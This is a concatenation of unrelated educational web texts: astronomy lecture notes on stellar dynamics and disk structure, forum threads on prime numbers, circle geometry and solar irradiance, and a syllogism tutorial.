The exercise shows that star-star encounters in the Milky Way are rare. Strictly speaking, we have showed that very close encounters are rare, so that changes in the velocities of the stars due to strong two body encounters are very small. We have not yet demonstrated that the sum effect of many weak encounters also has completely negligible effects over the life time of the Milky Way. This can be shown by a rigorous accounting of the sum of weak encounters for all impact parameters ranging from b = GM/v2 all the way to the size of the galaxy, R (see e.g. Binney are Tremaine, Chapter 4).
The main effect on the orbit of a star is the total gravity of the rest of the stars, and not the effects of individual encounters with other stars.
We will now look at how we can describe bulk stellar properties statistically. This will lead to two fundamental and extremely useful equations which relate the densities and velocities of the stars to the potential: the Boltzmann equation and the Jeans equation.
### Distribution function
Consider N stars which can be described in the 6-D space of position and velocity and in time by a distribution function f,
f = f (x,y,z;u,v,w;t)
where there are dN stars in the phase space element dx, dy, dz, dU, dV, dW, i.e. between x and x+dx, y and y+dy etc...
Then
dN = f(x,y,z;u,v,w;t)dx dy dz dU dV dW.
If we denote the gravitational potential of this distribution by Φ then the components of the gravitational force per unit mass are
Fx = ∂Φ/∂x,
Fy = ∂Φ/∂y,
Fz = ∂Φ/∂z.
The equations of motion of the ith star are given by
dUi/dt = Fx,
dVi/dt = Fy,
dWi/dt = Fz.
Now consider the number of stars in a cell of phase space, which changes by dN in a time dt:
dN = f(x+Udt, y+Vdt, z+Wdt; U+Fxdt, V+Fydt, W+Fzdt; t+dt)dQ'
where
dQ' = dU'dV'dW'dx'dy'dz' and x'=x+Udt etc... U'=U+Fxdt etc...
Finally, we consider a density configuration, in which the number of stars in each cell of phase space changes very slowly, so that to first order in dt, dQ' = dQ. The equations of motion can be expressed as a first order differential equaion of the distribution function f
∂f/∂t + U∂f/∂x + V∂f/∂y + W∂f/∂z + Fx∂f/∂U + Fy∂f/∂V + Fz∂f/∂W = 0.
This is the fundamental equation of stellar dynamics for a collisionless system of particles and is called the collisionless Boltzmann Equation.
If we assume that the Galaxy is in a steady state, so that the density of the stellar distribution is not changing with time (i.e. galaxies are not expanding or contracting along any direction), then the first term is vanishes
∂f/∂t = 0.
See section 4.1 and 4.2 of Binney and Tremaine for a complete description of the results summarised here. If we take moments of the Boltzmann Equation we can derive quite significant insight into the nature of the stellar distribution. Firstly, we can integrate the over all velocities dV = dUdVdW. The result is a continuity equation, ∂ρ/∂t + ∂(ρ)/∂x + ∂(ρ)/∂y + ∂(ρ)/∂z = 0 where , and denote the mean value of the velocity. The equation expresses physically the relationship between the rate at which stars enter and leave a volume element and the change in the density in the element. If we multiply the equations by the velocity and integrate over all velocities, we obtain a very useful first order description of the system (in terms of the second moment of the velocity) called the Jeans Equation. It is the equivalent for stellar systems of the Euler equation for fluid flow. (See BT section 4.2, and in particular equation 4-27). The Jeans equation for a 1-D self-gravitating system with velocity dispersion σ(z), density ρ(z) and potential &Phi(z) is 1/ρ d[ρσ2]/dz = −dΦ/dz. Note that the system is assumed to be stable, i.e. the density and velocity dispersion are explicitly assumed to be unchanging in time.
## The vertical structure of a galactic disk
Let us consider a self-gravitating disk of stars with vertical velocity dispersion σ.
Under the effect of their own self-gravity the stars will form a disk of finite thickness in the vertical direction. Stars with small velocity will be able to rise to small heights above the disk before returning, while the smaller number of stars with larger velocities will be able to rise to greater height. Stars with zero vertical velocity will be restricted to mid-plane orbits. If the system of stars is in a steady state, in which the disk gets neither thicker or thinner, then the distribution function of the stars is a function of z and W only.
f=f(z,W).
Since the system is in a steady state, we have
W df/dz + Fz df/dW = 0.
The distribution function allows one to recover many properties of the system. For example, the density ρ of the stars as a function of height is the integral over velocity of the distribution function
ρ(z) = M ∫ ∞-∞ f(z,W) dW (1)
where M is the mass of each star, considered to be the same for all stars to keep things simple.
The force generated vertically by this density distribution is given by the integral over z of the density
Fz(z) = −4πG ∫ z 0 ρ(z) dz (2)
These relations allow us to recover the density and potential of the stars, if we know the distribution function, DF. We'll now look at a very simple case of a DF, and show that it leads to quite plausible density distributions for stars in a disk.
### Some simple vertical distributions of stars in a disk
Let us now consider a distribution function in which the number of stars is an exponentially declining function of their energy E --- the more energy, the fewer the stars --- and is a function only of their energy.
f(E) = ρ(0)exp(−E/σ2)/√(2πσ2)
where the energy of the star is
E = KE + PE = (1/2) W2 + Φ(z).
We can define the potential to be zero at z=0 without losing generality, so that we can write f(E) in terms of Z height and W velocity of the stars
f(W,Z) = ρ(0) exp(−W2/2σ2) /√(2πσ2).
This distribution of kinetic energy has a maximum at W=0 and decreases rapidly with increasing W velocity --- it is simply the Gaussian distribution function in velocity with width (i.e. velocity dispersion σ). Note also that it is independent of Z --- stars have the same velocity distribution at all heights above the plane.
Exercise #2: Look back to an earlier lecture where we made an estimate of the stellar density near the Sun, and use this as the normalisation ρ(0) in the distribution function above. Use GNUPLOT to plot out the distribution function, adopting a vertical velocity dispersion of 20 km/s. Make an estimate of the space density of stars with speeds of more than 100 km/s. At what distance from the Sun would a volume around the Sun be expected to contain a few such stars?
### Isothermal disk
In general the velocity dispersion may change with Z, but let's first consider the case where the velocity dispersion is constant, as we just saw above. This is called an isothermal disk. The name isothermal (or constant temperature) shows that one is thinking here of the velocity dispersion of the stars as equivalent to their internal energy.
Integrating f=f(W) over velocity W we obtain the density distribution of the stars from Eqn (1). The solution has the form
ρ(z) = ρ(0) sech2(z/z0)
where z0 is the scale height of the stars, and is given by
z0 = σ / √(2 π G ρ(0)).
Note that sech is a hyperbolic trigonometric function
sech(x) = 1/cosh(x)
where cosh(x) = (exp(x)−exp(−x))/2 and sinh(x) = (exp(x)+exp(−x))/2.
A plot of the density distributions of this type are shown below for several different scale heights.
At large distances from the plane, it falls off close to exponentially, while close to the plane it is nicely rounded over, so that the density changes smoothly when crossing from negative to positive Z (i.e. the density gradient at Z=0 is zero).
Two of the distributions above are quite good descriptions for the young (100 pc scale height) and the old disk (300 pc scale height) respectively.
Exercise #3: build a model of the local disk by combining two sech2(z/z0) laws, one for the young disc and one for the old disc. Adopt a total local density of matter of 0.1 solar masses per cubic parsec. After choosing appropriate normalisations for the young disk and old disk's central densities, plot the combined density distribution. Although the summed distribution is a reasonable match to the real disk, What is wrong with simply summing the two density laws together?
### Vertical force on the stars
We can solve for the vertical force on the star using equation (2) above, now that we have derived the density distribution. The result is
Fz = −4πG ρ(0)z0 tanh(z/z0)
Hence the restoring force on a star is proportional to the disk central density and the scale height of the matter.
Below is plotted the force for the three disks above, normalised so that they all have the same central density (their total masses are in proportion to the scale heights).
Note that these three disks produce quite linear force laws within the first 100 pc or so, so that any star oscillating in this potential will be close to a simple harmonic oscillator. Note too that the force laws do not decline in a Keplerian fashion at large Z because we have considered an infinite thin sheet (which is not very physical except within a few scale heights of the the mid-plane).
### The Jeans Equation
In a 1-D system, the Jeans Equation takes the form :
ρFz = d(ρσ2)/dz.
The equation expresses the relation between the potential (i.e. the force field Fz(z)), the density distribution of the stars ρ(z) and the velocity dispersion of the stars, σ(z).
For an isothermal disk, σ is constant, and we have
Fz = (σ2/ρ) (dρ/dz).
Exercise #4: From the density distribution ρ = ρ(0) sech2(z/z0) and force law for an isothermal disk Fz = −4πGρ(0)z0tanh(z/z0), verify that the Jeans equation holds.
The exercise shows that, for an isothermal disk, the total force on the stars depends only on their density distribution and its gradient.
To solve the Jeans Equation for non-isothermal disks, one can start from a vertical density distribution and derive the velocity dispersion for the stars.
In this case, we combine the Jeans Equation and the 1-D Poisson Equation:
ρFz = d(ρσ2)/dz.
and
d2Φ/dz2 = −4πGρ.
To do this, differentiate the Jeans equation and substitute for Φ. The result is
d [ (1/ρ) d(ρσ2)/dz ] /dz = −4πGρ.
Thus, for a self-gravitating disk of a given density distribution, this allows us to now derive the velocity dispersion of the stars as a function of z height, as well as the vertical force downwards on the stars.
Exercise #5: We have already derived the velocity dispersion and force law for an isothermal disk, with σ = const. Observations show that the vertical density profile of the local galaxy is actually a bit sharper (more centrally concentrated) than the isothermal profile. It is in fact closer to being exponential: ρ = ρ(0) exp(-|z|/z0) For this exponential density law, first derive the force law Fz and using the Jeans equation derive the velocity dispersion profile &sigma(z); as function of height z. For the local disk, appropriate values to adopt are ρ(0) = 0.1 solar mass per cuic parsec and σ(0) = 20 km/s. Plot the density, force law and velocity dispersion profiles with GNUPLOT over the vertical range 0 to 1 kpc.
Review: We have looked at the Poisson, Jeans and Boltzmann equations for a simple, 1-D stellar system, the vertical structure of a disk of self-gravitating stars (and gas). They allow us to relate the density and dynamics of the stars without having to compute orbits of every star -- statistical properties can be sufficient for a wide range of purposes, one of which was shown here.
Exercise #6: This is a more challenging exercise. Recently, a very dim galaxy - a satellite of our own Milky Way - has been discovered by Belokurov et al (2007) in the SDSS survey, and is called Segue I. In this paper, the "core radius" and velocity dispersion of the galaxy have been measured as a=20 parsecs and σ=4 km/s. We will model this galaxy as an isothermal sphere (see lecture 4) to make an estimate of the amount of matter that lies within the core radius. First, use the Jeans equation to show that the velocity dispersion σ is related to the circular velocity via σ2 = 2 V2circ. Note : the Jeans equation in spherical coordinates is (1/ρ) d(ρσ2)/dr = -dΦ/dr. From the circular speed, make an estimate of the amount of matter within the core radius. The amount of visible matter within the core radius is approximately 300 solar masses (all seen as stars -- there is virtually no gas in the system). How does this compare with the estimate of the total matter? What do your results say about the system?
We have now looked at two 1-D systems -- the vertical distribution of stars in a disk, and the radial distribution of stars in an isothermal population. Later in the course we'll extend ourselves to more dimensions, by looking at the density and kinematics of stars in the Milky Way's stellar halo. |
# Between Fermat's primes and the twin primes
Let me start with a curiosity. The integers $11,13,17,19$ are prime numbers, and $101,103,107,109$ are prime as well. One might wonder whether there is another occurrence where $10^m+1,10^m+3,10^m+7$ and $10^m+9$ are prime numbers. If so, then necessarily $m=2^r$ for some integer $r$ (same argument as for Fermat's numbers).
It is still unknown whether there are infinitely many prime numbers in Fermat's list $2^{2^r}+1$. Presumably, the same question for the list $10^{2^r}+1$ remains open. Likewise, it is not known whether there are infinitely many twin prime numbers $(p,p+2)$. If we impose both constraints, could we expect the question to be more tractable ?
Are there finitely or infinitely many integers $r$ such that $10^{2^r}+\{1,3,7,9\}$ are all primes ? I guess No. For $r=2$, we have $10001=73\cdot137$. For $r=3$, $p=17$ divides $10^{2^3}+1$.
There is a natural extension of the question, where $10$ is replaced by $n\ge2$ and $\{1,3,7,9\}$ is replaced by a set of representatives of $({\mathbb Z}/n{\mathbb Z})^\times$.
An overwhelming belief is that there are only finitely many such exponents $r$. But I really ask whether there is a proof for some $n$, which involves our current artillery.
• While this is a famous unsolved problem, it seems certain that the Fermat primes are finitely many. If $X$ should be prime with probability $1/\log{X}$ (in the naive probabilistic model based on the PNT), then certainly an unbiased set $S \subset \mathbb{N}$ with $\sum_{s \in S} 1/\log{s} < \infty$ should have a finite intersection with the primes. – Vesselin Dimitrov Aug 12 '15 at 9:25
• BTW, for $r=2$ only $7$ and $9$ have the property. For $r=3$, only $7$ has the property. Unfortunately, I have not been able to find tables beyond $10^{13}$, but it would be interesting to see if $10^{16}+\{1,3,7,9\}$ contains any primes at all. – M.G. Aug 12 '15 at 9:32
• Vesselin, key word is unbiased. I am not so sure that it is so for $2^{2^n}+1$. Say, its prime factors a priori belong to arithmetic progression $2^{n+2}x+1$. Probably, we need more careful probabilistic heuristics. – Fedor Petrov Aug 12 '15 at 10:43
• @Fedor: You are right, "unbiased" probably does not apply here; though I still think it should be possible to give a reasonable heuristic taking care of the special property you mention, and predicting finiteness in this problem. (And for all I know, one may never find a prime in $2^{2^n}+1$ beyond $n = 4$.) – Vesselin Dimitrov Aug 12 '15 at 11:15
• For $2 \leq r \leq 1000$, there is always a prime $\leq 11605787$ that divides one of $10^{2^{r}} + k$ for $k \in \{1, 3, 7, 9 \}$. It's also true that $10^{2^{r}} +3$ is a multiple of $7$ if $r$ is even, and $19$ divides $10^{2^{r}} + 3$ if $r \equiv 5 \pmod{6}$. Finding and patching together similar congruences might allow one to produce a proof that at least of $10^{2^{r}} + k$ is composite for all $r \geq 2$. – Jeremy Rouse Aug 12 '15 at 15:11 |
# Multiply Three Numbers
In this multiplication activity, students solve 26 problems in which missing factors are filled in and order of operations rules are used. Students multiply three numbers with the factors in the parentheses first. |
# Math Help - Really tough circle problem
1. ## Really tough circle problem
Hi, My problem is this : find the equation of the circle determined by the given conditions :
center (-2,3) and tangent to the line 4y-3x+2=0.
the equation for the line is y=3/4x -1/2 (im pretty sure)
so I drew that line, then I figured I would need to use the distance formula from where the line starting at (-2,3) with slope -4/3 (negative reciprical of 3/4) intersects 4y-3x+2=0.
However, it doesnt intersect at a point, its an arbitrary point. I cant determine the exact x,y of it by graphing. I dont see how to make the distance formula = to an arbitrary point. Also the only other thing I can think of is that the circle can only intersect 4y-3x+2=0 once not twice. I also cant figure out how to make any triangles that would help me. Im stumped. What Do I do? Who knows the answer? I want to know badly.
2. You almost have it. *Really* close.
Formula for line from (-2, 3) with slope -4/3 is
y - 3 = -4/3(x + 2)
Now find where this intersects
4y - 3x + 2 = 0
These should intersect at one point, P, because they are perpendicular.
Calculate the distance from (-2, 3) to P, and this is the radius for your circle.
This touches the line once. Why? The radius from (-2,3) to P forms right angles with the line.
3. The distance from $(-2,3)$ to the line $3x-4y-2=0$ is $\dfrac{|3(-2)-4(3)-2|}{\sqrt{(3)^2+(-4)^2}}$.
That distance is the radius of the circle.
4. I want to know how to find p. When I graphed it P was not a point I could see, it was between different coordinates. How can I get the distance between the center and P if I have to guess what P is because its not on an exact point (meaning x and y are fractions and I cant tell what the fractions are.)
Also I got another similar question. - Center on the line x+y=1, Passes through (-2,1) and (-4,3):
I think that -2,1 and -4,3 should be focus and directx of a parabola, and any point on that parabola that hits the line x+y=1 should be the center since it will be equal distance from the 2 points and also on the line.
I got (y-2)=1/4(x+3) as the equation of the parabola (used midpoint formula to get vertex) and y=-x+1 as the line.
but I have the same problem as the other question. The line intersects the parabola at a point I can not tell when I graph them. x and y are fractions not exact points. How do I figure out problems that bottle down like this?
I need to know how to find P basicly. I mean, its possible my math was just wrong and P turned out to be a point on the graph though that is actual numbers not fractions.
(also how do I thank people who try to help me? I see it has a thanked option)
5. When two lines intersect, their x and y coordinates are equal.
y - 3 = -4/3(x + 2) intersects 4y - 3x + 2 = 0
at the x and y that simultaneously solves the 2 equations.
This solution for x and y is P.
Also you can use the formula for distance from point to line formula provided in an earlier post (without directly finding P).
6. To answer the OP, all one needs is the distance from the center to the tangent line.
We do not need to find p.
7. Your parabola question is a bit unclear.
Did you mean (y-2) = 1/4(x+3)^2 ?
To find the intersection between the parabola and the line y=-x+1
Again, you find the simultaneous solution(s) for x and y that solve both
(y-2) = 1/4(x+3)^2 and y=-x+1
Example: You can use substitution to get
(y-2) = (-x+1-2) = -x-1 = 1/4(x+3)^2
solve for x
and then use this to find y = -x+1
8. yeah i meant ^2 on the end of that parabola.
Also, I realize that the answer is the distance between p and center.
By graphing the line 4y-3x+2=0 I can not clearly tell which point intersects with the perpendicular line from the center of the circle. Therefore how can I tell what to input in the distance formula? This is what I want to know.
OK to best clear this up in my mind, You can tell me what to fill into this equation :
(x - -2)^2 + (y - 3)^2 = Z
What is x and y and how did you get x and y.
(-2 and 3 are the center of the circle, x and y are the points I cant clearly see when i graph the equation 4y-3x+2=0. also I understand what point it should be (the intersection) I just cant tell what it is)
9. Alright, lets do it by the intersection method.
y - 3 = -4/3(x + 2) intersects 4y - 3x + 2 = 0 where?
Lets solve this system (substitue y = -4/3(x+2) + 3 into the second equation)
4(-4/3(x+2) + 3) - 3x + 2 = 0
Solving give x = 2/5
y = -4/3(2/5 + 2) + 3 = -1/5
so P = (2/5, -1/5)
Distance from (-2,3) to (2/5,-1/5)?
sqrt((-2 - 2/5)^2 + (3 + 1/5)^2) = 4
Equation for the circle at center -2, 3 with radius 4 is
(x + 2)^2 + (y - 3)^2 = 4^2
10. Originally Posted by snowtea
Your parabola question is a bit unclear.
Did you mean (y-2) = 1/4(x+3)^2 ?
To find the intersection between the parabola and the line y=-x+1
Again, you find the simultaneous solution(s) for x and y that solve both
(y-2) = 1/4(x+3)^2 and y=-x+1
Example: You can use substitution to get
(y-2) = (-x+1-2) = -x-1 = 1/4(x+3)^2
solve for x
and then use this to find y = -x+1
hold on sorry didnt see this post trying it now. Also plato I saw the formula you posted but I didnt get why it would work. never seen that before.
11. On a tangent line to a circle, the point of tangency is the nearest point to the center.
So the distance from the center to a tangent line is the radius of the circle.
12. Awsome ! I never thought to substitute. Oops. I guess that when you substitute it takes the 1st equation and just adds the parameters of the 2nd. Then when you solve bang. Cool I so get it now. thank you so much to both of you for helping!
Ps how do I thank you guys? I see you get creds for helping people.
13. Originally Posted by Plato
The distance from $(-2,3)$ to the line $3x-4y-2=0$ is $\dfrac{|3(-2)-4(3)-2|}{\sqrt{(3)^2+(-4)^2}}$.
That distance is the radius of the circle.
Why does dividing the absolute value of the center into the equation of the line (without the =0) by the square root of the constants to the line squared give you the distance of the radius of the circle? How you help me picture why that works ?
14. Glad you got it. I think you were already really close from the beginning.
You can thank people by clicking the thanks button (thumbs up icon) under the post.
15. The formula is a shortcut for what you did with the perpendicular line.
If you solve for P algebraically and calculate this distance, it simplifies to the formula.
You can derive the formula in this way.
The reason why the equation looks so simple requires understanding a bit about vectors and dot products. You don't have to worry about it if you haven't learned about vectors yet.
Page 1 of 2 12 Last |
# Syllogisms or Statements and Conclusions
A syllogism question contains 2 or more Question statements, and 2 or more conclusions followed by 4 options.
Statement 1: - - - -
Statement 2: - - - -
Conclusion 1: - - - -
Conclusion 2: - - - -
Option 1: If only conclusion 1 can be drawn from the given statements.
Option 2: If only conclusion 2 can be drawn from the given statements.
Option 3: If both conclusions 1 and 2 can be drawn from the given statements.
Option 4: None of the conclusions can be drawn from the given statements.
Example Question:
Statements:
Conclusions:
1: All MBAs are Students
2: Some students are MBAs
There are two types of Conclusions:
1. Immediate Inferences
2. Logical Conclusions.
Immediate inferences are the conclusion which are drawn from only one statement. For example, From the statement All A's are B's, we can draw some A's are B's, Some B's are A's. These are easy to draw.
For Logical conclusions you have to follow complete theory.
Understanding Syllogism question:
Questions on syllogisms contains only the following 4 types of statements:
1. The universal positive : Eg: All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$
2. The universal negative : Eg: No $\mathop X\limits^{\rm{\surd}}$ is $\mathop Y\limits^{\rm{\surd}}$
3. The particular positive: Eg: Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
4. The particular negative : Eg: Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s
Here Checkmark ($\surd$) indicates "Distribution". If a term is distributed means It covers each and every element of it. All X are Ys means X $\in$ Y, But Y need not be a subset of X. So Y does not have check mark.
You should commit to memory, how to put $\surd$ marks and $\times$ marks and to distinguish positive and negative statements, universal and particular statements.
Here two statements are universal (1 and 2), and two statements are particular (3 and 4).
Two statements are positive (1 and 3) and two statements are negative (2 and 4).
I. The Universal Positive: All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$
It states that every member of the first class is also a member of the second class. Take a statement "All Tamilians are Indians". It does not necessarily follows All Indians are Tamilians. So Indians is not distributed on Tamilians.
The general diagram for Universal Affirmative ‘All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$’ is
Immediate inference:
1. Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
2. Some $\mathop Y\limits^{\rm{\times}}$ are $\mathop X\limits^{\rm{\times}}$
II. The universal Negative: No $\mathop X\limits^{\rm{\surd}}$ is $\mathop Y\limits^{\rm{\surd}}$
It states that no member of the first class is a member of the second class. This proposition takes the form - No X is Y.
The general diagram for Universal Negative ‘No X is Y’ is
Immediate Inferences:
1. No $\mathop Y\limits^{\rm{\surd}}$ is $\mathop X\limits^{\rm{\surd}}$
2. Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s,
3. Some $\mathop Y\limits^{\rm{\times}}$ are not $\mathop X\limits^{\rm{\surd}}$’s
III. The Particular Affirmative: Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
It states that at least one member, but never all, of the term designated by the class ‘X’ is also a member of the class designated by the term ‘Y’. This proposition takes the form Some Xs are Ys. This possible diagrams as shown by the Euler’s circles for this proposition are:
Immediate Inferences:
Some $\mathop Y\limits^{\rm{\times}}$ are $\mathop X\limits^{\rm{\times}}$
IV. The particular Negative: Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s.
It states that at least one member of the class designated by the term ‘X’ is excluded from the whole of the class designated by the term ‘Y’. This proposition takes the form Some Xs are not Ys. The Euler’s circle diagrams for this proposition are as follows.
Immediate Inferences: None
The shaded portion in each is that part of X that is not Y.
Most of the students get some doubt why "Y" is distributed here. Here is the explanation. Suppose take an example statement "Some students are not hardworking". This can be phrased as All the hardworking students are not some students". Or let us say, Rama is one of the student who is not hardworking. So not even a single hardworking student cannot be Rama. So All hardworking students cannot be Rama.
There are two methods to answer syllogisms.
1. Euler venn diagram method
2. Aristotle's rules Method
If all the statements are Universal you can easily draw venn diagrams and solve the questions. But If there are more particular statements, then you better learn Aristotle method. But Aristotle's method initially seems to be a bit difficult to understand, as one practices good number of questions, one can easily crack these questions.
Aristotle's Rules to solve syllogisms:
1. If both the statements are particular, no conclusion possible
(Explanation: Statements starting with "Some" are particular)
2. If both the statements are negative, no conclusion possible
3. If both the statements are positive, conclusion must be positive
4. If one statement is particular, conclusion must be particular
5. If one statement is negative, conclusion must be negative
6. Middle term must be distributed in atleast one of the premises
(Explanation: Middle term is the common term between two given premises, and A terms is distributed means it must have the "$\checkmark$" mark above it)
7. If a term is distributed in the conclusion, the term must be distributed in atleast one of the premises.
(Explanation: If any term is having star mark in the conclusion, it term must have star mark in the given premises)
8. If a term is distributed in both the statements only particular conclusion possible.
Solved Example 1:
Statements:
Conclusions:
1: All MBAs are Students
2: Some students are MBAs
Explanation:
Statement 1: All $\mathop {{\rm{MBA}}}\limits^{\rm{\surd}}$s are $\mathop {{\rm{Graduates}}}\limits^{\rm{\times}}$
Statement 2: All $\mathop {{\rm{Graduates}}}\limits^{\rm{\surd}}$ are $\mathop {{\rm{Students}}}\limits^{\rm{\times}}$
C1: All $\mathop {{\rm{MBA}}}\limits^\surd$ are $\mathop {{\rm{students}}}\limits^{\rm{\times}}$
C2: Some $\mathop {{\rm{Students}}}\limits^\times$ are $\mathop {{\rm{MBA}}}\limits^{\rm{\times}}$
Now Let us apply rules:
1. Both statements are positive, conclusion must be positive
2. Common term is Graduate and it has check mark in the second statement
Conclusion 1: MBA in the conclusion has got a check mark so it must have check mark in atleast one of the premises. MBA in S1 has got star mark. It satisfied all the rules. It is valid conclusion
Conclusion 2: No term in the conclusion has got a check mark so no need to check anything. It followed all the rules. This statement is a valid conclusion.
Solved Example 2:
Statements:
All Cats are Dogs
No Dog is Fish
Conclusions:
1. No Cat is Fish
2. Some Cats are Fish
Explanation:
S1: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Dogs}}}\limits^\chi$
S2: No $\mathop {{\rm{Dog}}}\limits^\surd$ is $\mathop {{\rm{Fish}}}\limits^\surd$
C1: No $\mathop {{\rm{Cat}}}\limits^\surd$ is $\mathop {{\rm{Fish}}}\limits^\surd$
C2: Some $\mathop {{\rm{Cats}}}\limits^\chi$ are $\mathop {{\rm{Fish}}}\limits^\chi$
Now Let us apply rules:
1. S2 is negative, so conclusion must be negative. So C2 is ruled out, as rule says that one statement is negative conclusion must be negative.
2. Common terms is Dog and it has check mark in both the premises
Conclusion 1: In the conclusion, both the terms Cat, Fish have check marks and These two terms have check marks in at least one of the premises. So Conclusion 1 is valid
Conclusion 2: As one of the premises is negative, conclusion must be negative. So this conclusion is not valid
Solved Example 3:
Statements:
Some books are toys.
No toy is red.
Conclusions:
1. Some toys are books.
2. Some books are not red.
Explanation:
S1: Some $\mathop {{\rm{Books}}}\limits^\chi$ are $\mathop {{\rm{Toys}}}\limits^\chi$
S2: No $\mathop {{\rm{Toy}}}\limits^\surd$ is $\mathop {{\rm{Red}}}\limits^\surd$
C1: Some $\mathop {{\rm{Toys}}}\limits^\chi$ are $\mathop {{\rm{Books}}}\limits^\chi$
C2: Some $\mathop {{\rm{Books}}}\limits^\chi$ are not $\mathop {{\rm{Red}}}\limits^\chi$
We can easily draw conclusion one as it is a direct inference from Statement 1.
Now by applying the rules,
Statement 2 is negative so conclusion must be negative. and middle term "Toy" should have a $\surd$ mark. It has $\surd$ mark in statement 2. Now If a term has a $\surd$ mark in the conclusion it should have $\surd$ mark in atleast one of the statements. Here "red" has $\surd$ mark in the conclusion and also has $\surd$ mark in statement 2.
So Statement 2 also following all the rules.
Both conclusions are valid.
Three Statement Types:
We can apply all the rules we learnt above while solving 3 statement questions too. Look at the options and see from which two statements those words are derived. If Once word is from first and another is from the third, we have to check that there are two middle terms with $\checkmark$.
Solved Example 4:
Statements:
All cats are dogs
some pigs are cats.
All dogs are tigers
Conclusions:
some tigers are cats
some pigs are tigers
all cats are tigers
some cats are not tigers
1. Only 1 and 2
2. Only 1, 2 and 3
3. All follow
4. None Follow
Explanation:
Let us rearrange for easy understanding.
S2: Some $\mathop {{\rm{Pigs}}}\limits^\chi$ are $\mathop {{\rm{Cats}}}\limits^\chi$
S1: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Dogs}}}\limits^\chi$
S3: All $\mathop {{\rm{Dogs}}}\limits^\surd$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C1: Some $\mathop {{\rm{Tigers}}}\limits^\chi$ are $\mathop {{\rm{Cats}}}\limits^\chi$
C2: Some $\mathop {{\rm{Pigs}}}\limits^\chi$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C3: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C4: Some $\mathop {{\rm{Cats}}}\limits^\chi$ are not $\mathop {{\rm{Tigers}}}\limits^\chi$
From statements 1 and 3, All Cats are Tigers is correct as dogs has $\surd$ mark. So conclusion 3 is correct. Also from the above, Some tigers are cats is also true. So conclusion 1 is correct.
Pigs is from 2nd statement and tigers is from third statements. If you observed our rearraged statements, In the second and first statements Cats has $\surd$ markand first and third statements has dogs has $\surd$ mark. So we can conclude that Some Pigs are tigers.
All the given statements are positive so conclusion should be positive. So option 4 is not correct. |
# proportion of solar radiation that reaches the earth surface
I have been following the methods suggested by members of this site to calculate the solar irradiance outside of the earth's atmosphere, see here.
I now want to calculate the solar irradiance reaching the earth's surface.
I calculate the irradiance outside the atmosphere as:
$$L_{\lambda} = \frac{2c^{2}h}{\lambda^{5}\left( \exp\left[hc/\lambda kT \right] - 1\right)}$$
where $h = 6.626\times 10^{-34}$
$c = 3 \times 10^{8}$
$T = 6000$
$k = 1.38066\times 10^{-23}$
$\lambda = 0:20 \times 10^{-9}:3200 \times 10^{-9}$
I then convert the units as: $$L_{\lambda} =L_{\lambda} \times 10^{-9}$$
multiply by the square of the ratio of the solar radius of earth's orbital radius $$L_{\lambda} =L_{\lambda} \times 2.177 \times 10^{-5}$$
apply Lambert's cosine law $$L_{\lambda} =L_{\lambda} \times \pi$$
which results in the upper curve seen in the following figure, i.e. the energy curve for a black body at 6000K:
I now wish to generate a second curve, one that shows the irradiance at the earth's surface. I know that the scattering and absorption processes that take place in the atmosphere not only reduce the intensity but also change the spectral distribution of the direct solar beam.
I want to show the spectral distribution of solar irradiance at seal level for a Zenith sun and a clear sky. So, the curve that I want to show is the spectral distribution as it would be if there were scattering but no absorption. For this I would also like to make the assumption that the solar elevation is more than 30 degrees.
Does anyone know how I could produce the curve explained above?
• Find someone who has a copy of MODTRAN :-) . The quality of your result will depend on the details of your model. For example, you could limit it to Rayleigh scattering plus $H_2O$ absorption. Jun 4 '14 at 13:46
This is getting complicated. :) You have to make a lot of assumptions to make progress; you have listed most of them. I'll explicitly add an assumption that we consider only Rayleigh scattering (more-or-less consistent with "clear sky"), and that the atmosphere is pure N${}_2$.
Since this is homework, I won't spill all the beans.
What you need is the cross section for Rayleigh scattering: how much light does each molecule remove from the incident light. Given that, then you have to figure out what to do with it. This will involve figuring out how many molecules are in the way between the Sun and your detector.
I will say that there are web sites that present the results you need without your having to do the calculations yourself.
Of course, this won't give you any of the absorption bands that show up in your chart. And, of course, it won't account for the fact that the light hitting the top of the atmosphere only approximately follows the black body curve. I haven't done the exercise myself, but I suspect you will end up reproducing one of the main features of those data.
Update
Since we're beyond homework: this Wikipedia page gives the Rayleigh scattering cross section for N${}_2$, and a value for molecular density, but it doesn't say if it's the average value or the value at the earth's surface. Nonetheless, that number can help in making order-of-magnitude estimates. At any rate, Rayleigh scattering goes as $\lambda^{-4}$, so when you take that into account you will multiply your result by $a\lambda^{-4}$ where a is some pre-factor that you don't know yet. You can try to make an estimate of the pre-factor using the data on that Wikipedia page, and perhaps some knowledges or guesses about the thickness of the atmosphere. (Or you can simply try different values for $a$ until you find one that works.) You might be able to model the fact that the solar data matches the b.b. curve for high frequencies, but not at lower frequencies.
• Thanks. Just to clarify, this is not actually homework (way passed that stage), just seemed like a relevant tag. Jun 4 '14 at 13:57
• what about the m = 1 part specified on the graph? Jun 4 '14 at 22:11
• I'm not sure, but I'm thinking that you might be able to reproduce the general outline of that curve. (Again, you won't be able to get the features that occurred before the light gets to the earth, and the absorption features from the atmosphere.) Jun 5 '14 at 0:23
• Is there a table somewhere that shows the percentage of spectral energy per wavelength band e.g. PAR constitutes 45 % of the energy at earth's surface and so on... Jun 5 '14 at 7:21
• Excuse my ignorance, but what is PAR? Jun 5 '14 at 11:51 |
# Binary cross entropy vs mse loss function when asymmetric payoffs
